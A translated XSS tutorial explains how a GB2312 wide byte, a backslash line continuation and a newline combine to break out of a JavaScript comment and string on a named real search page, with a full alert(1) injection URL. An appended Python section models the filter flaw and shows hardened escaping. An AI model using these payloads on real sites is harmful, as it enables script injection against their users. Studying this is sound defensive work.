In those years, we learned XSS together, part 7: the byte, the backslash and the newline take revenge together.

Source: Internet
Author: User

This time all three of them join forces.

1. The instance point is as follows:

http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|3500,4000&filtervalue=,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,hsdpa,hsdpa&tplname=centersearch.shtml&orderby=aaaaaaaaaaaa


As usual, let's start by looking at where our input is output.



2. There are three outputs in total. The first is inside an HTML attribute; we give up on that one because double quotes are escaped. That leaves two, both inside <script>...</script> and right next to each other.

3. Let's look at the second one first. Does it look familiar? Yes, we met it in tutorial 6: the output lands inside a // comment. Can we use a line break here?



4. One piece of good news and one piece of bad news. The good news is below. Now what do we do?

5. At this point we first need to talk about JavaScript.

In JavaScript a string literal can be written across several lines by ending each line with a backslash:

var a = "I am a string \
I am still a string";

alert(a);


6. Based on this, we can construct the injection points as shown below:

//document.getElementById("order_select").value = "aaaa\
alert(1);//";

var searchOrder = "aaaa\
alert(1);//";


The code structure is parsed as follows: in the first output the newline ends the // comment, so alert(1); on the next line is live code; in the second output the backslash turns the newline into a line continuation, so the string literal stays intact and the script has no syntax error.



7. With this idea in mind, let's bring in our backslash.



8. The tragedy is that the backslash is escaped into \\ (two backslashes), which is hard to get around.

9. Do you still remember the wide-byte trick from tutorial 4? A %C0 lead byte can swallow the byte that follows it.

Let's take a look at the page encoding:

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />


A GBxxx-series encoding, so wide bytes apply.

10. So our %c0 also joins the battle:

http://cgi.data.tech.qq.com/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|3500,4000&filtervalue=,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,hsdpa,hsdpa&tplname=centersearch.shtml&orderby=aaaa%c0%5c%0aalert(1);//


Look at the output in the page source: our \ has turned into a garbled character followed by a single \. The filter did double the backslash, but the browser, decoding the page as GB2312, pairs %c0 with the first \ into one double-byte character, leaving the second \ to escape the newline.



11. At this point the punctuation marks hold a meeting. The theme of the meeting: "Hello everyone, it's really good."

Solution: see the previous tutorials:

In those years, we learned XSS together, part 4: byte revenge [QQ Mail basics]
In those years, we learned XSS together, part 5: backslash revenge
In those years, we learned XSS together, part 6: newline revenge
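As an added example (not code from the original article, and not the site's own filter), the following Python models the two script contexts above, the byte-level backslash filter, and the wide-byte effect of a GB2312 page, next to an escaping routine that emits only ASCII \uXXXX sequences so the page charset cannot undo it. The filter, the templates and the input value are reconstructions from the article's description; decoding the input as GBK is an assumption.

```python
# Constructed sample: the percent-decoded orderby value from the article.
# 0xC0 is a GBK lead byte, 0x5C is '\', 0x0A is a newline.
CONSTRUCTED_INPUT = b"aaaa\xc0\x5c\x0aalert(1);//"

def naive_escape(raw: bytes) -> bytes:
    """Byte-level filter as the article describes it: doubles '\\' and escapes '"'."""
    return raw.replace(b"\\", b"\\\\").replace(b'"', b'\\"')

def hardened_escape(raw: bytes, input_charset: str = "gbk") -> bytes:
    """Decode to text first (charset assumed), keep only [A-Za-z0-9] and write every
    other character as \\uXXXX (BMP assumed). The output is pure ASCII, so no byte can
    pair with a GBK lead byte and no raw backslash or newline reaches the script."""
    text = raw.decode(input_charset, errors="replace")
    return "".join(c if c.isascii() and c.isalnum() else "\\u%04x" % ord(c)
                   for c in text).encode("ascii")

def render(escaped: bytes, page_charset: str = "gbk") -> str:
    """Embed the value in both script contexts from the article and decode the
    bytes the way a browser honouring the page's declared charset would."""
    script = (b'//document.getElementById("order_select").value = "' + escaped + b'";\n'
              + b'var searchOrder = "' + escaped + b'";\n')
    return script.decode(page_charset, errors="replace")

def live_statements(js: str) -> list:
    """Minimal JS scanner: returns the statements that would execute, with string
    literal bodies collapsed to "...". Handles // comments (ended by a newline) and
    double-quoted literals with backslash escapes, including backslash-newline
    continuation. A raw newline inside a literal is a SyntaxError, as in a browser."""
    out, cur, i, n = [], "", 0, len(js)
    while i < n:
        if js.startswith("//", i):                # comment runs to the end of the line
            j = js.find("\n", i)
            i = n if j < 0 else j
            continue
        if js[i] == '"':                          # string literal
            i += 1
            while i < n and js[i] != '"':
                if js[i] == "\n":
                    raise SyntaxError("unterminated string literal")
                i += 2 if js[i] == "\\" else 1    # escape, incl. '\' + newline
            cur, i = cur + '"..."', i + 1
            continue
        if js[i] in ";\n":                        # statement boundary
            if cur.strip():
                out.append(cur.strip())
            cur = ""
        else:
            cur += js[i]
        i += 1
    return out + ([cur.strip()] if cur.strip() else [])
```

With the naive filter the GB2312 page yields alert(1) as live code while the same bytes on a UTF-8 page only produce an unterminated string literal; the hardened encoder leaves a single harmless var statement under either charset.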
